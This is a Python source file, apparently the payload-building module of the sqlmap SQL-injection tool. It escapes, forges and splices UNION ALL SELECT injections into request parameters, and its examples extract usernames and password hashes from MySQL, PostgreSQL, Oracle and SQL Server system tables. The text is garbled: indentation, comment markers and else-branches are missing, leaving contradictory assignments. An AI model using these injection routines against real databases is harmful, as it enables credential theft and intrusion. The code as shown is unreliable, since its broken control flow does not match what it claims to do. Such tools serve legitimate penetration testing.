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#!/usr/bin/env python
Copyright (c) 2006-2010 sqlmap developers (http://sqlmap.sourceforge.net/)
See the file 'doc/COPYING' for copying permission
import re
from xml.etree import ElementTree as ET
from lib.core.common import Backend
from lib.core.common import getCompiledRegex
from lib.core.common import isDBMSVersionAtLeast
from lib.core.common import isTechniqueAvailable
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.convert import urlencode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import queries
from lib.core.datatype import advancedDict
from lib.core.enums import DBMS
from lib.core.enums import PAYLOAD
from lib.core.enums import PLACE
from lib.core.exception import sqlmapNoneDataException
from lib.core.settings import FROM_TABLE
from lib.core.settings import PAYLOAD_DELIMITER
from lib.core.settings import URI_INJECTION_MARK_CHAR
from lib.core.unescaper import unescaper
class Agent:
This class defines the SQL agent methods.
def payloadDirect(self, query):
if query.startswith("AND "):
query = query.replace("AND ", "SELECT ", 1)
elif query.startswith(" UNION ALL "):
query = query.replace(" UNION ALL ", "", 1)
elif query.startswith("; "):
query = query.replace("; ", "", 1)
if kb.tamperFunctions:
for function in kb.tamperFunctions:
query = function(query)
return query
def payload(self, place=None, parameter=None, value=None, newValue=None, where=None):
This method replaces the affected parameter with the SQL
injection statement to request
if conf.direct:
return self.payloadDirect(newValue)
retValue = ""
if where is None and isTechniqueAvailable(kb.technique):
where = kb.injection.data[kb.technique].where
# Debug print
#print "value: %s, newValue: %s, where: %s, kb.technique: %s" % (value, newValue, where, kb.technique)
if kb.injection.place is not None:
place = kb.injection.place
if kb.injection.parameter is not None:
parameter = kb.injection.parameter
paramString = conf.parameters[place]
paramDict = conf.paramDict[place]
origValue = paramDict[parameter]
if place == PLACE.URI:
origValue = origValue.split(URI_INJECTION_MARK_CHAR)[0]
origValue = origValue[origValue.rfind('/') + 1:]
if value is None:
value = origValue
if newValue.startswith("-"):
value = ""
value = "-%s" % randomInt()
value = ""
value = origValue
newValue = "%s%s" % (value, newValue)
newValue = self.cleanupPayload(newValue, origValue)
if "POSTxml" in conf.paramDict and place == PLACE.POST:
root = ET.XML(paramString)
iterator = root.getiterator(parameter)
for child in iterator:
child.text = self.addPayloadDelimiters(newValue)
retValue = ET.tostring(root)
elif place == PLACE.URI:
retValue = paramString.replace("%s%s" % (origValue, URI_INJECTION_MARK_CHAR), self.addPayloadDelimiters(newValue))
elif place in (PLACE.UA, PLACE.REFERER):
retValue = paramString.replace(origValue, self.addPayloadDelimiters(newValue))
retValue = paramString.replace("%s=%s" % (parameter, origValue),
"%s=%s" % (parameter, self.addPayloadDelimiters(newValue)))
# Debug print
#print "retValue:", retValue
return retValue
def fullPayload(self, query):
if conf.direct:
return self.payloadDirect(query)
query = self.prefixQuery(query)
query = self.suffixQuery(query)
payload = self.payload(newValue=query)
return payload
def prefixQuery(self, expression, prefix=None, where=None, clause=None):
This method defines how the input expression has to be escaped
to perform the injection depending on the injection type
identified as valid
if conf.direct:
return self.payloadDirect(expression)
expression = self.cleanupPayload(expression)
expression = unescaper.unescape(expression)
query = None
if where is None and kb.technique and kb.technique in kb.injection.data:
where = kb.injection.data[kb.technique].where
# If we are replacing (<where>) the parameter original value with
# our payload do not prepend with the prefix
query = ""
# If the technique is stacked queries (<stype>) do not put a space
# after the prefix or it is in GROUP BY / ORDER BY (<clause>)
elif kb.technique == PAYLOAD.TECHNIQUE.STACKED:
query = kb.injection.prefix
elif kb.injection.clause == [2, 3] or kb.injection.clause == [ 2 ] or kb.injection.clause == [ 3 ]:
query = kb.injection.prefix
elif clause == [2, 3] or clause == [ 2 ] or clause == [ 3 ]:
query = prefix
# In any other case prepend with the full prefix
query = kb.injection.prefix or prefix or ""
if not (expression and expression[0] == ";"):
query += " "
query = "%s%s" % (query, expression)
return query
def suffixQuery(self, expression, comment=None, suffix=None, where=None):
This method appends the DBMS comment to the
SQL injection request
if conf.direct:
return self.payloadDirect(expression)
expression = self.cleanupPayload(expression)
if comment is not None:
expression += comment
if where is None and kb.technique and kb.technique in kb.injection.data:
where = kb.injection.data[kb.technique].where
# If we are replacing (<where>) the parameter original value with
# our payload do not append the suffix
elif kb.injection.suffix is not None:
expression += " %s" % kb.injection.suffix
elif suffix is not None:
expression += " %s" % suffix
return expression.rstrip()
def cleanupPayload(self, payload, origValue=None):
if payload is None:
randInt = randomInt()
randInt1 = randomInt()
randStr = randomStr()
randStr1 = randomStr()
payload = payload.replace("[RANDNUM]", str(randInt))
payload = payload.replace("[RANDNUM1]", str(randInt1))
payload = payload.replace("[RANDSTR]", randStr)
payload = payload.replace("[RANDSTR1]", randStr1)
payload = payload.replace("[DELIMITER_START]", kb.misc.start)
payload = payload.replace("[DELIMITER_STOP]", kb.misc.stop)
payload = payload.replace("[SPACE_REPLACE]", kb.misc.space)
payload = payload.replace("[DOLLAR_REPLACE]", kb.misc.dollar)
payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))
if origValue is not None:
payload = payload.replace("[ORIGVALUE]", origValue)
if "[INFERENCE]" in payload:
if Backend.getIdentifiedDbms() is not None:
inference = queries[Backend.getIdentifiedDbms()].inference
if "dbms_version" in inference:
if isDBMSVersionAtLeast(inference.dbms_version):
inferenceQuery = inference.query
inferenceQuery = inference.query2
inferenceQuery = inference.query
payload = payload.replace("[INFERENCE]", inferenceQuery)
errMsg = "invalid usage of inference payload without "
errMsg += "knowledge of underlying DBMS"
raise sqlmapNoneDataException, errMsg
return payload
def getComment(self, reqObj):
if "comment" in reqObj:
comment = reqObj.comment
comment = ""
return comment
def nullAndCastField(self, field):
Take in input a field string and return its processed nulled and
casted field string.
MySQL input: VERSION()
MySQL output: IFNULL(CAST(VERSION() AS CHAR(10000)), ' ')
MySQL scope: VERSION()
PostgreSQL input: VERSION()
PostgreSQL output: COALESCE(CAST(VERSION() AS CHARACTER(10000)), ' ')
PostgreSQL scope: VERSION()
Oracle input: banner
Oracle output: NVL(CAST(banner AS VARCHAR(4000)), ' ')
Oracle scope: SELECT banner FROM v$version WHERE ROWNUM=1
Microsoft SQL Server input: @@VERSION
Microsoft SQL Server output: ISNULL(CAST(@@VERSION AS VARCHAR(8000)), ' ')
Microsoft SQL Server scope: @@VERSION
@param field: field string to be processed
@type field: C{str}
@return: field string nulled and casted
@rtype: C{str}
# SQLite version 2 does not support neither CAST() nor IFNULL(),
# introduced only in SQLite version 3
if Backend.getIdentifiedDbms() == DBMS.SQLITE:
return field
if field.startswith("(CASE"):
nulledCastedField = field
nulledCastedField = queries[Backend.getIdentifiedDbms()].cast.query % field
if Backend.getIdentifiedDbms() == DBMS.ACCESS:
nulledCastedField = queries[Backend.getIdentifiedDbms()].isnull.query % (nulledCastedField, nulledCastedField)
nulledCastedField = queries[Backend.getIdentifiedDbms()].isnull.query % nulledCastedField
return nulledCastedField
def nullCastConcatFields(self, fields):
Take in input a sequence of fields string and return its processed
nulled, casted and concatenated fields string.
MySQL input: user,password
MySQL output: IFNULL(CAST(user AS CHAR(10000)), ' '),'UWciUe',IFNULL(CAST(password AS CHAR(10000)), ' ')
MySQL scope: SELECT user, password FROM mysql.user
PostgreSQL input: usename,passwd
PostgreSQL output: COALESCE(CAST(usename AS CHARACTER(10000)), ' ')||'xRBcZW'||COALESCE(CAST(passwd AS CHARACTER(10000)), ' ')
PostgreSQL scope: SELECT usename, passwd FROM pg_shadow
Oracle output: NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), ' ')||'UUlHUa'||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), ' ')
Microsoft SQL Server input: name,master.dbo.fn_varbintohexstr(password)
Microsoft SQL Server output: ISNULL(CAST(name AS VARCHAR(8000)), ' ')+'nTBdow'+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), ' ')
Microsoft SQL Server scope: SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
@param fields: fields string to be processed
@type fields: C{str}
@return: fields string nulled, casted and concatened
@rtype: C{str}
if not Backend.getDbms():
return fields
if fields.startswith("(CASE") or fields.startswith("SUBSTR"):
nulledCastedConcatFields = fields
fields = fields.replace(", ", ",")
fieldsSplitted = fields.split(",")
dbmsDelimiter = queries[Backend.getIdentifiedDbms()].delimiter.query
nulledCastedFields = []
for field in fieldsSplitted:
delimiterStr = "%s'%s'%s" % (dbmsDelimiter, kb.misc.delimiter, dbmsDelimiter)
nulledCastedConcatFields = delimiterStr.join([field for field in nulledCastedFields])
return nulledCastedConcatFields
def getFields(self, query):
Take in input a query string and return its fields (columns) and
more details.
Input: SELECT user, password FROM mysql.user
Output: user,password
@param query: query to be processed
@type query: C{str}
@return: query fields (columns) and more details
@rtype: C{str}
prefixRegex = "(?:\s+(?:FIRST|SKIP)\s+\d+)*"
fieldsSelectTop = re.search("\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I)
fieldsSelectDistinct = re.search("\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I)
fieldsSelectCase = re.search("\ASELECT%s\s+(\(CASE WHEN\s+.+\s+END\))" % prefixRegex, query, re.I)
fieldsSelectFrom = re.search("\ASELECT%s\s+(.+?)\s+FROM\s+" % prefixRegex, query, re.I)
fieldsExists = re.search("EXISTS(.*)", query, re.I)
fieldsSelect = re.search("\ASELECT%s\s+(.*)" % prefixRegex, query, re.I)
fieldsSubstr = re.search("\ASUBSTR", query, re.I)
fieldsNoSelect = query
if fieldsSubstr:
fieldsToCastStr = query
elif fieldsExists:
fieldsToCastStr = fieldsSelect.groups()[0]
elif fieldsSelectTop:
fieldsToCastStr = fieldsSelectTop.groups()[0]
elif fieldsSelectDistinct:
fieldsToCastStr = fieldsSelectDistinct.groups()[0]
elif fieldsSelectCase:
fieldsToCastStr = fieldsSelectCase.groups()[0]
elif fieldsSelectFrom:
fieldsToCastStr = fieldsSelectFrom.groups()[0]
elif fieldsSelect:
fieldsToCastStr = fieldsSelect.groups()[0]
elif fieldsNoSelect:
fieldsToCastStr = fieldsNoSelect
# Function
if re.search("\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr:
fieldsToCastList = [fieldsToCastStr]
fieldsToCastList = fieldsToCastStr.replace(", ", ",")
fieldsToCastList = fieldsToCastList.split(",")
return fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsSelectTop, fieldsSelectCase, fieldsToCastList, fieldsToCastStr, fieldsExists
def simpleConcatQuery(self, query1, query2):
concatenatedQuery = ""
if Backend.getIdentifiedDbms() == DBMS.MYSQL:
concatenatedQuery = "CONCAT(%s,%s)" % (query1, query2)
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE):
concatenatedQuery = "%s||%s" % (query1, query2)
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
concatenatedQuery = "%s+%s" % (query1, query2)
return concatenatedQuery
def concatQuery(self, query, unpack=True):
Take in input a query string and return its processed nulled,
casted and concatenated query string.
MySQL input: SELECT user, password FROM mysql.user
MySQL output: CONCAT('mMvPxc',IFNULL(CAST(user AS CHAR(10000)), ' '),'nXlgnR',IFNULL(CAST(password AS CHAR(10000)), ' '),'YnCzLl') FROM mysql.user
PostgreSQL input: SELECT usename, passwd FROM pg_shadow
PostgreSQL output: 'HsYIBS'||COALESCE(CAST(usename AS CHARACTER(10000)), ' ')||'KTBfZp'||COALESCE(CAST(passwd AS CHARACTER(10000)), ' ')||'LkhmuP' FROM pg_shadow
Microsoft SQL Server input: SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
Microsoft SQL Server output: 'QQMQJO'+ISNULL(CAST(name AS VARCHAR(8000)), ' ')+'kAtlqH'+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), ' ')+'lpEqoi' FROM master..sysxlogins
@param query: query string to be processed
@type query: C{str}
@return: query string nulled, casted and concatenated
@rtype: C{str}
if unpack:
concatenatedQuery = ""
query = query.replace(", ", ",")
fieldsSelectFrom, fieldsSelect, fieldsNoSelect, fieldsSelectTop, fieldsSelectCase, _, fieldsToCastStr, fieldsExists = self.getFields(query)
castedFields = self.nullCastConcatFields(fieldsToCastStr)
concatenatedQuery = query.replace(fieldsToCastStr, castedFields, 1)
return query
if Backend.getIdentifiedDbms() == DBMS.MYSQL:
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.misc.start, 1)
concatenatedQuery += ",'%s')" % kb.misc.stop
elif fieldsSelectCase:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.misc.start, 1)
concatenatedQuery += ",'%s')" % kb.misc.stop
elif fieldsSelectFrom:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.misc.start, 1)
concatenatedQuery = concatenatedQuery.replace(" FROM ", ",'%s') FROM " % kb.misc.stop, 1)
elif fieldsSelect:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT('%s'," % kb.misc.start, 1)
concatenatedQuery += ",'%s')" % kb.misc.stop
elif fieldsNoSelect:
concatenatedQuery = "CONCAT('%s',%s,'%s')" % (kb.misc.start, concatenatedQuery, kb.misc.stop)
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.ORACLE, DBMS.SQLITE):
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.misc.start, 1)
concatenatedQuery += "||'%s'" % kb.misc.stop
elif fieldsSelectCase:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||(SELECT " % kb.misc.start, 1)
concatenatedQuery += ")||'%s'" % kb.misc.stop
elif fieldsSelectFrom:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.misc.start, 1)
concatenatedQuery = concatenatedQuery.replace(" FROM ", "||'%s' FROM " % kb.misc.stop, 1)
elif fieldsSelect:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.misc.start, 1)
concatenatedQuery += "||'%s'" % kb.misc.stop
elif fieldsNoSelect:
concatenatedQuery = "'%s'||%s||'%s'" % (kb.misc.start, concatenatedQuery, kb.misc.stop)
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.misc.start, 1)
concatenatedQuery += "+'%s'" % kb.misc.stop
elif fieldsSelectTop:
topNum = re.search("\ASELECT\s+TOP\s+([\d]+)\s+", concatenatedQuery, re.I).group(1)
concatenatedQuery = concatenatedQuery.replace("SELECT TOP %s " % topNum, "TOP %s '%s'+" % (topNum, kb.misc.start), 1)
concatenatedQuery = concatenatedQuery.replace(" FROM ", "+'%s' FROM " % kb.misc.stop, 1)
elif fieldsSelectCase:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.misc.start, 1)
concatenatedQuery += "+'%s'" % kb.misc.stop
elif fieldsSelectFrom:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.misc.start, 1)
concatenatedQuery = concatenatedQuery.replace(" FROM ", "+'%s' FROM " % kb.misc.stop, 1)
elif fieldsSelect:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'+" % kb.misc.start, 1)
concatenatedQuery += "+'%s'" % kb.misc.stop
elif fieldsNoSelect:
concatenatedQuery = "'%s'+%s+'%s'" % (kb.misc.start, concatenatedQuery, kb.misc.stop)
return concatenatedQuery
def forgeInbandQuery(self, query, position, count, comment, prefix, suffix, char, multipleUnions=None):
Take in input an query (pseudo query) string and return its
processed UNION ALL SELECT query.
MySQL input: CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)) FROM mysql.user
MySQL output: UNION ALL SELECT NULL, CONCAT(CHAR(120,121,75,102,103,89),IFNULL(CAST(user AS CHAR(10000)), CHAR(32)),CHAR(106,98,66,73,109,81),IFNULL(CAST(password AS CHAR(10000)), CHAR(32)),CHAR(105,73,99,89,69,74)), NULL FROM mysql.user-- AND 7488=7488
PostgreSQL input: (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)) FROM pg_shadow
PostgreSQL output: UNION ALL SELECT NULL, (CHR(116)||CHR(111)||CHR(81)||CHR(80)||CHR(103)||CHR(70))||COALESCE(CAST(usename AS CHARACTER(10000)), (CHR(32)))||(CHR(106)||CHR(78)||CHR(121)||CHR(111)||CHR(84)||CHR(85))||COALESCE(CAST(passwd AS CHARACTER(10000)), (CHR(32)))||(CHR(108)||CHR(85)||CHR(122)||CHR(85)||CHR(108)||CHR(118)), NULL FROM pg_shadow-- AND 7133=713
Oracle input: (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)) FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))
Oracle output: UNION ALL SELECT NULL, (CHR(109)||CHR(89)||CHR(75)||CHR(109)||CHR(85)||CHR(68))||NVL(CAST(COLUMN_NAME AS VARCHAR(4000)), (CHR(32)))||(CHR(108)||CHR(110)||CHR(89)||CHR(69)||CHR(122)||CHR(90))||NVL(CAST(DATA_TYPE AS VARCHAR(4000)), (CHR(32)))||(CHR(89)||CHR(80)||CHR(98)||CHR(77)||CHR(80)||CHR(121)), NULL FROM SYS.ALL_TAB_COLUMNS WHERE TABLE_NAME=(CHR(85)||CHR(83)||CHR(69)||CHR(82)||CHR(83))-- AND 6738=6738
Microsoft SQL Server input: (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)) FROM master..sysxlogins
Microsoft SQL Server output: UNION ALL SELECT NULL, (CHAR(74)+CHAR(86)+CHAR(106)+CHAR(116)+CHAR(116)+CHAR(108))+ISNULL(CAST(name AS VARCHAR(8000)), (CHAR(32)))+(CHAR(89)+CHAR(87)+CHAR(116)+CHAR(100)+CHAR(106)+CHAR(74))+ISNULL(CAST(master.dbo.fn_varbintohexstr(password) AS VARCHAR(8000)), (CHAR(32)))+(CHAR(71)+CHAR(74)+CHAR(68)+CHAR(66)+CHAR(85)+CHAR(106)), NULL FROM master..sysxlogins-- AND 3254=3254
@param query: it is a processed query string unescaped to be
forged within an UNION ALL SELECT statement
@type query: C{str}
@param position: it is the NULL position where it is possible
to inject the query
@type position: C{int}
@return: UNION ALL SELECT query string forged
@rtype: C{str}
if query.startswith("SELECT "):
query = query[len("SELECT "):]
inbandQuery = self.prefixQuery("UNION ALL SELECT ", prefix=prefix)
if query.startswith("TOP"):
# TOP enumeration on DBMS.MSSQL is too specific and it has to go into it's own brackets
# because those NULLs cause problems with ORDER BY clause
if Backend.getIdentifiedDbms() == DBMS.MSSQL:
inbandQuery += ",".join(map(lambda x: char if x != position else '(SELECT %s)' % query, range(0, count)))
inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)
return inbandQuery
topNum = re.search("\ATOP\s+([\d]+)\s+", query, re.I).group(1)
query = query[len("TOP %s " % topNum):]
inbandQuery += "TOP %s " % topNum
intoRegExp = re.search("(\s+INTO (DUMP|OUT)FILE\s+\'(.+?)\')", query, re.I)
if intoRegExp:
intoRegExp = intoRegExp.group(1)
query = query[:query.index(intoRegExp)]
if Backend.getIdentifiedDbms() in FROM_TABLE and inbandQuery.endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
inbandQuery = inbandQuery[:-len(FROM_TABLE[Backend.getIdentifiedDbms()])]
for element in range(0, count):
if element > 0:
inbandQuery += ", "
if element == position:
if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
conditionIndex = query.index(" FROM ")
inbandQuery += query[:conditionIndex]
inbandQuery += query
inbandQuery += char
if " FROM " in query and ("(CASE " not in query or ("(CASE " in query and "WHEN use" in query)) and "EXISTS(" not in query and not query.startswith("SELECT "):
conditionIndex = query.index(" FROM ")
inbandQuery += query[conditionIndex:]
if Backend.getIdentifiedDbms() in FROM_TABLE:
if " FROM " not in inbandQuery or "(CASE " in inbandQuery:
inbandQuery += FROM_TABLE[Backend.getIdentifiedDbms()]
if intoRegExp:
inbandQuery += intoRegExp
if multipleUnions:
inbandQuery += " UNION ALL SELECT "
for element in range(count):
if element > 0:
inbandQuery += ", "
if element == position:
inbandQuery += multipleUnions
inbandQuery += char
if Backend.getIdentifiedDbms() in FROM_TABLE:
inbandQuery += FROM_TABLE[Backend.getIdentifiedDbms()]
inbandQuery = self.suffixQuery(inbandQuery, comment, suffix)
return inbandQuery
def limitQuery(self, num, query, field=None, uniqueField=None):
Take in input a query string and return its limited query string.
Input: SELECT user FROM mysql.users
Output: SELECT user FROM mysql.users LIMIT <num>, 1
@param num: limit number
@type num: C{int}
@param query: query to be processed
@type query: C{str}
@param field: field within the query
@type field: C{list}
@return: limited query string
@rtype: C{str}
limitedQuery = query
limitStr = queries[Backend.getIdentifiedDbms()].limit.query
fromIndex = limitedQuery.index(" FROM ")
untilFrom = limitedQuery[:fromIndex]
fromFrom = limitedQuery[fromIndex+1:]
orderBy = False
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.SQLITE):
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num, 1)
limitedQuery += " %s" % limitStr
elif Backend.getIdentifiedDbms() == DBMS.FIREBIRD:
limitStr = queries[Backend.getIdentifiedDbms()].limit.query % (num+1, num+1)
limitedQuery += " %s" % limitStr
elif Backend.getIdentifiedDbms() == DBMS.ORACLE:
if " ORDER BY " in limitedQuery and "(SELECT " in limitedQuery:
orderBy = limitedQuery[limitedQuery.index(" ORDER BY "):]
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
if query.startswith("SELECT "):
delimiter = queries[Backend.getIdentifiedDbms()].delimiter.query
limitedQuery = "%s FROM (%s, %s" % (untilFrom, untilFrom.replace(delimiter, ','), limitStr)
limitedQuery = "%s FROM (SELECT %s, %s" % (untilFrom, ", ".join(f for f in field), limitStr)
limitedQuery = limitedQuery % fromFrom
limitedQuery += "=%d" % (num + 1)
elif Backend.getIdentifiedDbms() == DBMS.MSSQL:
forgeNotIn = True
if " ORDER BY " in limitedQuery:
orderBy = limitedQuery[limitedQuery.index(" ORDER BY "):]
limitedQuery = limitedQuery[:limitedQuery.index(" ORDER BY ")]
notDistincts = re.findall("DISTINCT[\(\s+](.+?)\)*\s+", limitedQuery, re.I)
for notDistinct in notDistincts:
limitedQuery = limitedQuery.replace("DISTINCT(%s)" % notDistinct, notDistinct)
limitedQuery = limitedQuery.replace("DISTINCT %s" % notDistinct, notDistinct)
if limitedQuery.startswith("SELECT TOP ") or limitedQuery.startswith("TOP "):
topNums = re.search(queries[Backend.getIdentifiedDbms()].limitregexp.query, limitedQuery, re.I)
if topNums:
topNums = topNums.groups()
quantityTopNums = topNums[0]
limitedQuery = limitedQuery.replace("TOP %s" % quantityTopNums, "TOP 1", 1)
startTopNums = topNums[1]
limitedQuery = limitedQuery.replace(" (SELECT TOP %s" % startTopNums, " (SELECT TOP %d" % num)
forgeNotIn = False
topNum = re.search("TOP\s+([\d]+)\s+", limitedQuery, re.I).group(1)
limitedQuery = limitedQuery.replace("TOP %s " % topNum, "")
if forgeNotIn:
limitedQuery = limitedQuery.replace("SELECT ", (limitStr % 1), 1)
if " ORDER BY " not in fromFrom:
# Reference: http://vorg.ca/626-the-MS-SQL-equivalent-to-MySQLs-limit-command
if " WHERE " in limitedQuery:
limitedQuery = "%s AND %s " % (limitedQuery, uniqueField or field)
limitedQuery = "%s WHERE ISNULL(%s,' ') " % (limitedQuery, uniqueField or field)
limitedQuery += "NOT IN (%s" % (limitStr % num)
limitedQuery += "ISNULL(%s,' ') %s ORDER BY %s) ORDER BY %s" % (uniqueField or field, fromFrom, uniqueField or field, uniqueField or field)
if " WHERE " in limitedQuery:
limitedQuery = "%s AND %s " % (limitedQuery, field)
limitedQuery = "%s WHERE %s " % (limitedQuery, field)
limitedQuery += "NOT IN (%s" % (limitStr % num)
limitedQuery += "%s %s)" % (field, fromFrom)
if orderBy:
limitedQuery += orderBy
return limitedQuery
def forgeCaseStatement(self, expression):
Take in input a query string and return its CASE statement query
Input: (SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y'
Output: SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), '@', 1)) LIMIT 0, 1)='Y') THEN 1 ELSE 0 END)
@param expression: expression to be processed
@type num: C{str}
@return: processed expression
@rtype: C{str}
caseExpression = expression
if Backend.getIdentifiedDbms() is not None and hasattr(queries[Backend.getIdentifiedDbms()], "case"):
caseExpression = queries[Backend.getIdentifiedDbms()].case.query % expression
if Backend.getIdentifiedDbms() in FROM_TABLE and not caseExpression.upper().endswith(FROM_TABLE[Backend.getIdentifiedDbms()]):
caseExpression += FROM_TABLE[Backend.getIdentifiedDbms()]
return caseExpression
def addPayloadDelimiters(self, inpStr):
Adds payload delimiters around the input string
retVal = inpStr
if inpStr:
return retVal
def removePayloadDelimiters(self, inpStr):
Removes payload delimiters from inside the input string
retVal = inpStr
if inpStr:
retVal = retVal.replace(PAYLOAD_DELIMITER, '')
return retVal
def extractPayload(self, inpStr):
Extracts payload from inside of the input string
retVal = None
if inpStr:
regObj = getCompiledRegex("%s(?P<result>.*?)%s" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER))
match = regObj.search(inpStr)
if match:
retVal = match.group("result")
return retVal
def replacePayload(self, inpStr, payload):
Replaces payload inside the input string with a given payload
retVal = inpStr
if inpStr:
regObj = getCompiledRegex("(%s.*?%s)" % (PAYLOAD_DELIMITER, PAYLOAD_DELIMITER))
retVal = regObj.sub("%s%s%s" % (PAYLOAD_DELIMITER, payload, PAYLOAD_DELIMITER), inpStr)
return retVal
# SQL agent
agent = Agent()